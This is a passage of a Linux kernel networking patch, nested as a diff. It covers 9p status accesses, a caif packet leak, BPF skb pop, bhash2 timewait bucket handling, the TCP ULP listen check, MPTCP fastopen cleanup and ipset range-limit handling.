+@@ -532,9 +532,10 @@ req_retry_pinned:
+ 	spin_unlock_irqrestore(&chan->lock, flags);
+ 	kicked = 1;
+ 	p9_debug(P9_DEBUG_TRANS, "virtio request kicked\n");
+-	err = wait_event_killable(req->wq, req->status >= REQ_STATUS_RCVD);
++	err = wait_event_killable(req->wq,
++			          READ_ONCE(req->status) >= REQ_STATUS_RCVD);
+ 	// RERROR needs reply (== error string) in static data
+-	if (req->status == REQ_STATUS_RCVD &&
++	if (READ_ONCE(req->status) == REQ_STATUS_RCVD &&
+ 	    unlikely(req->rc.sdata[4] == P9_RERROR))
+ 		handle_rerror(req, in_hdr_len, offs, in_pages);
+ 
+diff --git a/net/9p/trans_xen.c b/net/9p/trans_xen.c
+index aaa5fd364691b..cf1b89ba522b4 100644
+--- a/net/9p/trans_xen.c
++++ b/net/9p/trans_xen.c
+@@ -157,7 +157,7 @@ again:
+ 			      &masked_prod, masked_cons,
+ 			      XEN_9PFS_RING_SIZE(ring));
+ 
+-	p9_req->status = REQ_STATUS_SENT;
++	WRITE_ONCE(p9_req->status, REQ_STATUS_SENT);
+ 	virt_wmb();			/* write ring before updating pointer */
+ 	prod += size;
+ 	ring->intf->out_prod = prod;
+@@ -212,7 +212,7 @@ static void p9_xen_response(struct work_struct *work)
+ 			dev_warn(&priv->dev->dev,
+ 				 "requested packet size too big: %d for tag %d with capacity %zd\n",
+ 				 h.size, h.tag, req->rc.capacity);
+-			req->status = REQ_STATUS_ERROR;
++			WRITE_ONCE(req->status, REQ_STATUS_ERROR);
+ 			goto recv_error;
+ 		}
+ 
+diff --git a/net/caif/cfctrl.c b/net/caif/cfctrl.c
+index cc405d8c7c303..8480684f27625 100644
+--- a/net/caif/cfctrl.c
++++ b/net/caif/cfctrl.c
+@@ -269,11 +269,15 @@ int cfctrl_linkup_request(struct cflayer *layer,
+ 	default:
+ 		pr_warn("Request setup of bad link type = %d\n",
+ 			param->linktype);
++		cfpkt_destroy(pkt);
+ 		return -EINVAL;
+ 	}
+ 	req = kzalloc(sizeof(*req), GFP_KERNEL);
+-	if (!req)
++	if (!req) {
++		cfpkt_destroy(pkt);
+ 		return -ENOMEM;
++	}
++
+ 	req->client_layer = user_layer;
+ 	req->cmd = CFCTRL_CMD_LINK_SETUP;
+ 	req->param = *param;
+diff --git a/net/core/filter.c b/net/core/filter.c
+index a368edd9057c7..0c2666e041d3c 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -3184,15 +3184,18 @@ static int bpf_skb_generic_push(struct sk_buff *skb, u32 off, u32 len)
+ 
+ static int bpf_skb_generic_pop(struct sk_buff *skb, u32 off, u32 len)
+ {
++	void *old_data;
++
+ 	/* skb_ensure_writable() is not needed here, as we're
+ 	 * already working on an uncloned skb.
+ 	 */
+ 	if (unlikely(!pskb_may_pull(skb, off + len)))
+ 		return -ENOMEM;
+ 
+-	skb_postpull_rcsum(skb, skb->data + off, len);
+-	memmove(skb->data + len, skb->data, off);
++	old_data = skb->data;
+ 	__skb_pull(skb, len);
++	skb_postpull_rcsum(skb, old_data + off, len);
++	memmove(skb->data, old_data, off);
+ 
+ 	return 0;
+ }
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 4a34bc7cb15ed..647b3c6b575ef 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -173,22 +173,40 @@ static bool inet_bind_conflict(const struct sock *sk, struct sock *sk2,
+ 	return false;
+ }
+ 
++static bool __inet_bhash2_conflict(const struct sock *sk, struct sock *sk2,
++				   kuid_t sk_uid, bool relax,
++				   bool reuseport_cb_ok, bool reuseport_ok)
++{
++	if (sk->sk_family == AF_INET && ipv6_only_sock(sk2))
++		return false;
++
++	return inet_bind_conflict(sk, sk2, sk_uid, relax,
++				  reuseport_cb_ok, reuseport_ok);
++}
++
+ static bool inet_bhash2_conflict(const struct sock *sk,
+ 				 const struct inet_bind2_bucket *tb2,
+ 				 kuid_t sk_uid,
+ 				 bool relax, bool reuseport_cb_ok,
+ 				 bool reuseport_ok)
+ {
++	struct inet_timewait_sock *tw2;
+ 	struct sock *sk2;
+ 
+ 	sk_for_each_bound_bhash2(sk2, &tb2->owners) {
+-		if (sk->sk_family == AF_INET && ipv6_only_sock(sk2))
+-			continue;
++		if (__inet_bhash2_conflict(sk, sk2, sk_uid, relax,
++					   reuseport_cb_ok, reuseport_ok))
++			return true;
++	}
+ 
+-		if (inet_bind_conflict(sk, sk2, sk_uid, relax,
+-				       reuseport_cb_ok, reuseport_ok))
++	twsk_for_each_bound_bhash2(tw2, &tb2->deathrow) {
++		sk2 = (struct sock *)tw2;
++
++		if (__inet_bhash2_conflict(sk, sk2, sk_uid, relax,
++					   reuseport_cb_ok, reuseport_ok))
+ 			return true;
+ 	}
++
+ 	return false;
+ }
+ 
+@@ -1182,12 +1200,26 @@ void inet_csk_prepare_forced_close(struct sock *sk)
+ }
+ EXPORT_SYMBOL(inet_csk_prepare_forced_close);
+ 
++static int inet_ulp_can_listen(const struct sock *sk)
++{
++	const struct inet_connection_sock *icsk = inet_csk(sk);
++
++	if (icsk->icsk_ulp_ops && !icsk->icsk_ulp_ops->clone)
++		return -EINVAL;
++
++	return 0;
++}
++
+ int inet_csk_listen_start(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 	struct inet_sock *inet = inet_sk(sk);
+ 	int err;
+ 
++	err = inet_ulp_can_listen(sk);
++	if (unlikely(err))
++		return err;
++
+ 	reqsk_queue_alloc(&icsk->icsk_accept_queue);
+ 
+ 	sk->sk_ack_backlog = 0;
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index 3cec471a2cd2f..67f5e54408020 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -116,6 +116,7 @@ static void inet_bind2_bucket_init(struct inet_bind2_bucket *tb,
+ #endif
+ 		tb->rcv_saddr = sk->sk_rcv_saddr;
+ 	INIT_HLIST_HEAD(&tb->owners);
++	INIT_HLIST_HEAD(&tb->deathrow);
+ 	hlist_add_head(&tb->node, &head->chain);
+ }
+ 
+@@ -137,7 +138,7 @@ struct inet_bind2_bucket *inet_bind2_bucket_create(struct kmem_cache *cachep,
+ /* Caller must hold hashbucket lock for this tb with local BH disabled */
+ void inet_bind2_bucket_destroy(struct kmem_cache *cachep, struct inet_bind2_bucket *tb)
+ {
+-	if (hlist_empty(&tb->owners)) {
++	if (hlist_empty(&tb->owners) && hlist_empty(&tb->deathrow)) {
+ 		__hlist_del(&tb->node);
+ 		kmem_cache_free(cachep, tb);
+ 	}
+@@ -1103,15 +1104,16 @@ ok:
+ 	/* Head lock still held and bh's disabled */
+ 	inet_bind_hash(sk, tb, tb2, port);
+ 
+-	spin_unlock(&head2->lock);
+-
+ 	if (sk_unhashed(sk)) {
+ 		inet_sk(sk)->inet_sport = htons(port);
+ 		inet_ehash_nolisten(sk, (struct sock *)tw, NULL);
+ 	}
+ 	if (tw)
+ 		inet_twsk_bind_unhash(tw, hinfo);
++
++	spin_unlock(&head2->lock);
+ 	spin_unlock(&head->lock);
++
+ 	if (tw)
+ 		inet_twsk_deschedule_put(tw);
+ 	local_bh_enable();
+diff --git a/net/ipv4/inet_timewait_sock.c b/net/ipv4/inet_timewait_sock.c
+index 66fc940f9521a..1d77d992e6e77 100644
+--- a/net/ipv4/inet_timewait_sock.c
++++ b/net/ipv4/inet_timewait_sock.c
+@@ -29,6 +29,7 @@
+ void inet_twsk_bind_unhash(struct inet_timewait_sock *tw,
+ 			  struct inet_hashinfo *hashinfo)
+ {
++	struct inet_bind2_bucket *tb2 = tw->tw_tb2;
+ 	struct inet_bind_bucket *tb = tw->tw_tb;
+ 
+ 	if (!tb)
+@@ -37,6 +38,11 @@ void inet_twsk_bind_unhash(struct inet_timewait_sock *tw,
+ 	__hlist_del(&tw->tw_bind_node);
+ 	tw->tw_tb = NULL;
+ 	inet_bind_bucket_destroy(hashinfo->bind_bucket_cachep, tb);
++
++	__hlist_del(&tw->tw_bind2_node);
++	tw->tw_tb2 = NULL;
++	inet_bind2_bucket_destroy(hashinfo->bind2_bucket_cachep, tb2);
++
+ 	__sock_put((struct sock *)tw);
+ }
+ 
+@@ -45,7 +51,7 @@ static void inet_twsk_kill(struct inet_timewait_sock *tw)
+ {
+ 	struct inet_hashinfo *hashinfo = tw->tw_dr->hashinfo;
+ 	spinlock_t *lock = inet_ehash_lockp(hashinfo, tw->tw_hash);
+-	struct inet_bind_hashbucket *bhead;
++	struct inet_bind_hashbucket *bhead, *bhead2;
+ 
+ 	spin_lock(lock);
+ 	sk_nulls_del_node_init_rcu((struct sock *)tw);
+@@ -54,9 +60,13 @@ static void inet_twsk_kill(struct inet_timewait_sock *tw)
+ 	/* Disassociate with bind bucket. */
+ 	bhead = &hashinfo->bhash[inet_bhashfn(twsk_net(tw), tw->tw_num,
+ 			hashinfo->bhash_size)];
++	bhead2 = inet_bhashfn_portaddr(hashinfo, (struct sock *)tw,
++				       twsk_net(tw), tw->tw_num);
+ 
+ 	spin_lock(&bhead->lock);
++	spin_lock(&bhead2->lock);
+ 	inet_twsk_bind_unhash(tw, hashinfo);
++	spin_unlock(&bhead2->lock);
+ 	spin_unlock(&bhead->lock);
+ 
+ 	refcount_dec(&tw->tw_dr->tw_refcount);
+@@ -93,6 +103,12 @@ static void inet_twsk_add_bind_node(struct inet_timewait_sock *tw,
+ 	hlist_add_head(&tw->tw_bind_node, list);
+ }
+ 
++static void inet_twsk_add_bind2_node(struct inet_timewait_sock *tw,
++				     struct hlist_head *list)
++{
++	hlist_add_head(&tw->tw_bind2_node, list);
++}
++
+ /*
+  * Enter the time wait state. This is called with locally disabled BH.
+  * Essentially we whip up a timewait bucket, copy the relevant info into it
+@@ -105,17 +121,28 @@ void inet_twsk_hashdance(struct inet_timewait_sock *tw, struct sock *sk,
+ 	const struct inet_connection_sock *icsk = inet_csk(sk);
+ 	struct inet_ehash_bucket *ehead = inet_ehash_bucket(hashinfo, sk->sk_hash);
+ 	spinlock_t *lock = inet_ehash_lockp(hashinfo, sk->sk_hash);
+-	struct inet_bind_hashbucket *bhead;
++	struct inet_bind_hashbucket *bhead, *bhead2;
++
+ 	/* Step 1: Put TW into bind hash. Original socket stays there too.
+ 	   Note, that any socket with inet->num != 0 MUST be bound in
+ 	   binding cache, even if it is closed.
+ 	 */
+ 	bhead = &hashinfo->bhash[inet_bhashfn(twsk_net(tw), inet->inet_num,
+ 			hashinfo->bhash_size)];
++	bhead2 = inet_bhashfn_portaddr(hashinfo, sk, twsk_net(tw), inet->inet_num);
++
+ 	spin_lock(&bhead->lock);
++	spin_lock(&bhead2->lock);
++
+ 	tw->tw_tb = icsk->icsk_bind_hash;
+ 	WARN_ON(!icsk->icsk_bind_hash);
+ 	inet_twsk_add_bind_node(tw, &tw->tw_tb->owners);
++
++	tw->tw_tb2 = icsk->icsk_bind2_hash;
++	WARN_ON(!icsk->icsk_bind2_hash);
++	inet_twsk_add_bind2_node(tw, &tw->tw_tb2->deathrow);
++
++	spin_unlock(&bhead2->lock);
+ 	spin_unlock(&bhead->lock);
+ 
+ 	spin_lock(lock);
+diff --git a/net/ipv4/tcp_ulp.c b/net/ipv4/tcp_ulp.c
+index 9ae50b1bd8444..05b6077b9f2c3 100644
+--- a/net/ipv4/tcp_ulp.c
++++ b/net/ipv4/tcp_ulp.c
+@@ -139,6 +139,10 @@ static int __tcp_set_ulp(struct sock *sk, const struct tcp_ulp_ops *ulp_ops)
+ 	if (sk->sk_socket)
+ 		clear_bit(SOCK_SUPPORT_ZC, &sk->sk_socket->flags);
+ 
++	err = -EINVAL;
++	if (!ulp_ops->clone && sk->sk_state == TCP_LISTEN)
++		goto out_err;
++
+ 	err = ulp_ops->init(sk);
+ 	if (err)
+ 		goto out_err;
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 1dbc625372595..e97465f0c6672 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -1673,6 +1673,8 @@ static void mptcp_set_nospace(struct sock *sk)
+ 	set_bit(MPTCP_NOSPACE, &mptcp_sk(sk)->flags);
+ }
+ 
++static int mptcp_disconnect(struct sock *sk, int flags);
++
+ static int mptcp_sendmsg_fastopen(struct sock *sk, struct sock *ssk, struct msghdr *msg,
+ 				  size_t len, int *copied_syn)
+ {
+@@ -1683,9 +1685,9 @@ static int mptcp_sendmsg_fastopen(struct sock *sk, struct sock *ssk, struct msgh
+ 	lock_sock(ssk);
+ 	msg->msg_flags |= MSG_DONTWAIT;
+ 	msk->connect_flags = O_NONBLOCK;
+-	msk->is_sendmsg = 1;
++	msk->fastopening = 1;
+ 	ret = tcp_sendmsg_fastopen(ssk, msg, copied_syn, len, NULL);
+-	msk->is_sendmsg = 0;
++	msk->fastopening = 0;
+ 	msg->msg_flags = saved_flags;
+ 	release_sock(ssk);
+ 
+@@ -1699,6 +1701,8 @@ static int mptcp_sendmsg_fastopen(struct sock *sk, struct sock *ssk, struct msgh
+ 		 */
+ 		if (ret && ret != -EINPROGRESS && ret != -ERESTARTSYS && ret != -EINTR)
+ 			*copied_syn = 0;
++	} else if (ret && ret != -EINPROGRESS) {
++		mptcp_disconnect(sk, 0);
+ 	}
+ 
+ 	return ret;
+@@ -2367,7 +2371,7 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		/* otherwise tcp will dispose of the ssk and subflow ctx */
+ 		if (ssk->sk_state == TCP_LISTEN) {
+ 			tcp_set_state(ssk, TCP_CLOSE);
+-			mptcp_subflow_queue_clean(ssk);
++			mptcp_subflow_queue_clean(sk, ssk);
+ 			inet_csk_listen_stop(ssk);
+ 		}
+ 		__tcp_close(ssk, 0);
+@@ -3000,6 +3004,14 @@ static int mptcp_disconnect(struct sock *sk, int flags)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
++	/* We are on the fastopen error path. We can't call straight into the
++	 * subflows cleanup code due to lock nesting (we are already under
++	 * msk->firstsocket lock). Do nothing and leave the cleanup to the
++	 * caller.
++	 */
++	if (msk->fastopening)
++		return 0;
++
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+ 
+ 	mptcp_stop_timer(sk);
+@@ -3566,7 +3578,7 @@ static int mptcp_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 	/* if reaching here via the fastopen/sendmsg path, the caller already
+ 	 * acquired the subflow socket lock, too.
+ 	 */
+-	if (msk->is_sendmsg)
++	if (msk->fastopening)
+ 		err = __inet_stream_connect(ssock, uaddr, addr_len, msk->connect_flags, 1);
+ 	else
+ 		err = inet_stream_connect(ssock, uaddr, addr_len, msk->connect_flags);
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 6a09ab99a12de..62e9ff237b6e8 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -286,7 +286,7 @@ struct mptcp_sock {
+ 	u8		recvmsg_inq:1,
+ 			cork:1,
+ 			nodelay:1,
+-			is_sendmsg:1;
++			fastopening:1;
+ 	int		connect_flags;
+ 	struct work_struct work;
+ 	struct sk_buff  *ooo_last_skb;
+@@ -614,7 +614,7 @@ void mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		     struct mptcp_subflow_context *subflow);
+ void __mptcp_subflow_send_ack(struct sock *ssk);
+ void mptcp_subflow_reset(struct sock *ssk);
+-void mptcp_subflow_queue_clean(struct sock *ssk);
++void mptcp_subflow_queue_clean(struct sock *sk, struct sock *ssk);
+ void mptcp_sock_graft(struct sock *sk, struct socket *parent);
+ struct socket *__mptcp_nmpc_socket(const struct mptcp_sock *msk);
+ bool __mptcp_close(struct sock *sk, long timeout);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 613f515fedf0a..9d3701fdb2937 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1733,7 +1733,7 @@ static void subflow_state_change(struct sock *sk)
+ 	}
+ }
+ 
+-void mptcp_subflow_queue_clean(struct sock *listener_ssk)
++void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_ssk)
+ {
+ 	struct request_sock_queue *queue = &inet_csk(listener_ssk)->icsk_accept_queue;
+ 	struct mptcp_sock *msk, *next, *head = NULL;
+@@ -1782,8 +1782,23 @@ void mptcp_subflow_queue_clean(struct sock *listener_ssk)
+ 
+ 		do_cancel_work = __mptcp_close(sk, 0);
+ 		release_sock(sk);
+-		if (do_cancel_work)
++		if (do_cancel_work) {
++			/* lockdep will report a false positive ABBA deadlock
++			 * between cancel_work_sync and the listener socket.
++			 * The involved locks belong to different sockets WRT
++			 * the existing AB chain.
++			 * Using a per socket key is problematic as key
++			 * deregistration requires process context and must be
++			 * performed at socket disposal time, in atomic
++			 * context.
++			 * Just tell lockdep to consider the listener socket
++			 * released here.
++			 */
++			mutex_release(&listener_sk->sk_lock.dep_map, _RET_IP_);
+ 			mptcp_cancel_work(sk);
++			mutex_acquire(&listener_sk->sk_lock.dep_map,
++				      SINGLE_DEPTH_NESTING, 0, _RET_IP_);
++		}
+ 		sock_put(sk);
+ 	}
+ 
+diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
+index e7ba5b6dd2b7c..46ebee9400dab 100644
+--- a/net/netfilter/ipset/ip_set_core.c
++++ b/net/netfilter/ipset/ip_set_core.c
+@@ -1698,9 +1698,10 @@ call_ad(struct net *net, struct sock *ctnl, struct sk_buff *skb,
+ 		ret = set->variant->uadt(set, tb, adt, &lineno, flags, retried);
+ 		ip_set_unlock(set);
+ 		retried = true;
+-	} while (ret == -EAGAIN &&
+-		 set->variant->resize &&
+-		 (ret = set->variant->resize(set, retried)) == 0);
++	} while (ret == -ERANGE ||
++		 (ret == -EAGAIN &&
++		  set->variant->resize &&
++		  (ret = set->variant->resize(set, retried)) == 0));
+ 
+ 	if (!ret || (ret == -IPSET_ERR_EXIST && eexist))
+ 		return 0;
+diff --git a/net/netfilter/ipset/ip_set_hash_ip.c b/net/netfilter/ipset/ip_set_hash_ip.c
+index 75d556d71652d..24adcdd7a0b16 100644
+--- a/net/netfilter/ipset/ip_set_hash_ip.c
++++ b/net/netfilter/ipset/ip_set_hash_ip.c
+@@ -98,11 +98,11 @@ static int
+ hash_ip4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 	      enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_ip4 *h = set->data;
++	struct hash_ip4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_ip4_elem e = { 0 };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+-	u32 ip = 0, ip_to = 0, hosts;
++	u32 ip = 0, ip_to = 0, hosts, i = 0;
+ 	int ret = 0;
+ 
+ 	if (tb[IPSET_ATTR_LINENO])
+@@ -147,14 +147,14 @@ hash_ip4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 
+ 	hosts = h->netmask == 32 ? 1 : 2 << (32 - h->netmask - 1);
+ 
+-	/* 64bit division is not allowed on 32bit */
+-	if (((u64)ip_to - ip + 1) >> (32 - h->netmask) > IPSET_MAX_RANGE)
+-		return -ERANGE;
+-
+ 	if (retried)
+ 		ip = ntohl(h->next.ip);
+-	for (; ip <= ip_to;) {
++	for (; ip <= ip_to; i++) {
+ 		e.ip = htonl(ip);
++		if (i > IPSET_MAX_RANGE) {
++			hash_ip4_data_next(&h->next, &e);
++			return -ERANGE;
++		}
+ 		ret = adtfn(set, &e, &ext, &ext, flags);
+ 		if (ret && !ip_set_eexist(ret, flags))
+ 			return ret;
+diff --git a/net/netfilter/ipset/ip_set_hash_ipmark.c b/net/netfilter/ipset/ip_set_hash_ipmark.c
+index 153de3457423e..a22ec1a6f6ec8 100644
+--- a/net/netfilter/ipset/ip_set_hash_ipmark.c
++++ b/net/netfilter/ipset/ip_set_hash_ipmark.c
+@@ -97,11 +97,11 @@ static int
+ hash_ipmark4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		  enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_ipmark4 *h = set->data;
++	struct hash_ipmark4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_ipmark4_elem e = { };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+-	u32 ip, ip_to = 0;
++	u32 ip, ip_to = 0, i = 0;
+ 	int ret;
+ 
+ 	if (tb[IPSET_ATTR_LINENO])
+@@ -148,13 +148,14 @@ hash_ipmark4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		ip_set_mask_from_to(ip, ip_to, cidr);
+ 	}
+ 
+-	if (((u64)ip_to - ip + 1) > IPSET_MAX_RANGE)
+-		return -ERANGE;
+-
+ 	if (retried)
+ 		ip = ntohl(h->next.ip);
+-	for (; ip <= ip_to; ip++) {
++	for (; ip <= ip_to; ip++, i++) {
+ 		e.ip = htonl(ip);
++		if (i > IPSET_MAX_RANGE) {
++			hash_ipmark4_data_next(&h->next, &e);
++			return -ERANGE;
++		}
+ 		ret = adtfn(set, &e, &ext, &ext, flags);
+ 
+ 		if (ret && !ip_set_eexist(ret, flags))
+diff --git a/net/netfilter/ipset/ip_set_hash_ipport.c b/net/netfilter/ipset/ip_set_hash_ipport.c
+index 7303138e46be1..10481760a9b25 100644
+--- a/net/netfilter/ipset/ip_set_hash_ipport.c
++++ b/net/netfilter/ipset/ip_set_hash_ipport.c
+@@ -105,11 +105,11 @@ static int
+ hash_ipport4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		  enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_ipport4 *h = set->data;
++	struct hash_ipport4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_ipport4_elem e = { .ip = 0 };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+-	u32 ip, ip_to = 0, p = 0, port, port_to;
++	u32 ip, ip_to = 0, p = 0, port, port_to, i = 0;
+ 	bool with_ports = false;
+ 	int ret;
+ 
+@@ -173,17 +173,18 @@ hash_ipport4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 			swap(port, port_to);
+ 	}
+ 
+-	if (((u64)ip_to - ip + 1)*(port_to - port + 1) > IPSET_MAX_RANGE)
+-		return -ERANGE;
+-
+ 	if (retried)
+ 		ip = ntohl(h->next.ip);
+ 	for (; ip <= ip_to; ip++) {
+ 		p = retried && ip == ntohl(h->next.ip) ? ntohs(h->next.port)
+ 						       : port;
+-		for (; p <= port_to; p++) {
++		for (; p <= port_to; p++, i++) {
+ 			e.ip = htonl(ip);
+ 			e.port = htons(p);
++			if (i > IPSET_MAX_RANGE) {
++				hash_ipport4_data_next(&h->next, &e);
++				return -ERANGE;
++			}
+ 			ret = adtfn(set, &e, &ext, &ext, flags);
+ 
+ 			if (ret && !ip_set_eexist(ret, flags))
+diff --git a/net/netfilter/ipset/ip_set_hash_ipportip.c b/net/netfilter/ipset/ip_set_hash_ipportip.c
+index 334fb1ad0e86c..39a01934b1536 100644
+--- a/net/netfilter/ipset/ip_set_hash_ipportip.c
++++ b/net/netfilter/ipset/ip_set_hash_ipportip.c
+@@ -108,11 +108,11 @@ static int
+ hash_ipportip4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		    enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_ipportip4 *h = set->data;
++	struct hash_ipportip4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_ipportip4_elem e = { .ip = 0 };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+-	u32 ip, ip_to = 0, p = 0, port, port_to;
++	u32 ip, ip_to = 0, p = 0, port, port_to, i = 0;
+ 	bool with_ports = false;
+ 	int ret;
+ 
+@@ -180,17 +180,18 @@ hash_ipportip4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 			swap(port, port_to);
+ 	}
+ 
+-	if (((u64)ip_to - ip + 1)*(port_to - port + 1) > IPSET_MAX_RANGE)
+-		return -ERANGE;
+-
+ 	if (retried)
+ 		ip = ntohl(h->next.ip);
+ 	for (; ip <= ip_to; ip++) {
+ 		p = retried && ip == ntohl(h->next.ip) ? ntohs(h->next.port)
+ 						       : port;
+-		for (; p <= port_to; p++) {
++		for (; p <= port_to; p++, i++) {
+ 			e.ip = htonl(ip);
+ 			e.port = htons(p);
++			if (i > IPSET_MAX_RANGE) {
++				hash_ipportip4_data_next(&h->next, &e);
++				return -ERANGE;
++			}
+ 			ret = adtfn(set, &e, &ext, &ext, flags);
+ 
+ 			if (ret && !ip_set_eexist(ret, flags))
+diff --git a/net/netfilter/ipset/ip_set_hash_ipportnet.c b/net/netfilter/ipset/ip_set_hash_ipportnet.c
+index 7df94f437f600..5c6de605a9fb7 100644
+--- a/net/netfilter/ipset/ip_set_hash_ipportnet.c
++++ b/net/netfilter/ipset/ip_set_hash_ipportnet.c
+@@ -160,12 +160,12 @@ static int
+ hash_ipportnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		     enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_ipportnet4 *h = set->data;
++	struct hash_ipportnet4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_ipportnet4_elem e = { .cidr = HOST_MASK - 1 };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+ 	u32 ip = 0, ip_to = 0, p = 0, port, port_to;
+-	u32 ip2_from = 0, ip2_to = 0, ip2;
++	u32 ip2_from = 0, ip2_to = 0, ip2, i = 0;
+ 	bool with_ports = false;
+ 	u8 cidr;
+ 	int ret;
+@@ -253,9 +253,6 @@ hash_ipportnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 			swap(port, port_to);
+ 	}
+ 
+-	if (((u64)ip_to - ip + 1)*(port_to - port + 1) > IPSET_MAX_RANGE)
+-		return -ERANGE;
+-
+ 	ip2_to = ip2_from;
+ 	if (tb[IPSET_ATTR_IP2_TO]) {
+ 		ret = ip_set_get_hostipaddr4(tb[IPSET_ATTR_IP2_TO], &ip2_to);
+@@ -282,9 +279,15 @@ hash_ipportnet4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		for (; p <= port_to; p++) {
+ 			e.port = htons(p);
+ 			do {
++				i++;
+ 				e.ip2 = htonl(ip2);
+ 				ip2 = ip_set_range_to_cidr(ip2, ip2_to, &cidr);
+ 				e.cidr = cidr - 1;
++				if (i > IPSET_MAX_RANGE) {
++					hash_ipportnet4_data_next(&h->next,
++								  &e);
++					return -ERANGE;
++				}
+ 				ret = adtfn(set, &e, &ext, &ext, flags);
+ 
+ 				if (ret && !ip_set_eexist(ret, flags))
+diff --git a/net/netfilter/ipset/ip_set_hash_net.c b/net/netfilter/ipset/ip_set_hash_net.c
+index 1422739d9aa25..ce0a9ce5a91f1 100644
+--- a/net/netfilter/ipset/ip_set_hash_net.c
++++ b/net/netfilter/ipset/ip_set_hash_net.c
+@@ -136,11 +136,11 @@ static int
+ hash_net4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 	       enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_net4 *h = set->data;
++	struct hash_net4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_net4_elem e = { .cidr = HOST_MASK };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+-	u32 ip = 0, ip_to = 0, ipn, n = 0;
++	u32 ip = 0, ip_to = 0, i = 0;
+ 	int ret;
+ 
+ 	if (tb[IPSET_ATTR_LINENO])
+@@ -188,19 +188,16 @@ hash_net4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		if (ip + UINT_MAX == ip_to)
+ 			return -IPSET_ERR_HASH_RANGE;
+ 	}
+-	ipn = ip;
+-	do {
+-		ipn = ip_set_range_to_cidr(ipn, ip_to, &e.cidr);
+-		n++;
+-	} while (ipn++ < ip_to);
+-
+-	if (n > IPSET_MAX_RANGE)
+-		return -ERANGE;
+ 
+ 	if (retried)
+ 		ip = ntohl(h->next.ip);
+ 	do {
++		i++;
+ 		e.ip = htonl(ip);
++		if (i > IPSET_MAX_RANGE) {
++			hash_net4_data_next(&h->next, &e);
++			return -ERANGE;
++		}
+ 		ip = ip_set_range_to_cidr(ip, ip_to, &e.cidr);
+ 		ret = adtfn(set, &e, &ext, &ext, flags);
+ 		if (ret && !ip_set_eexist(ret, flags))
+diff --git a/net/netfilter/ipset/ip_set_hash_netiface.c b/net/netfilter/ipset/ip_set_hash_netiface.c
+index 9810f5bf63f5e..0310732862362 100644
+--- a/net/netfilter/ipset/ip_set_hash_netiface.c
++++ b/net/netfilter/ipset/ip_set_hash_netiface.c
+@@ -202,7 +202,7 @@ hash_netiface4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_netiface4_elem e = { .cidr = HOST_MASK, .elem = 1 };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+-	u32 ip = 0, ip_to = 0, ipn, n = 0;
++	u32 ip = 0, ip_to = 0, i = 0;
+ 	int ret;
+ 
+ 	if (tb[IPSET_ATTR_LINENO])
+@@ -256,19 +256,16 @@ hash_netiface4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 	} else {
+ 		ip_set_mask_from_to(ip, ip_to, e.cidr);
+ 	}
+-	ipn = ip;
+-	do {
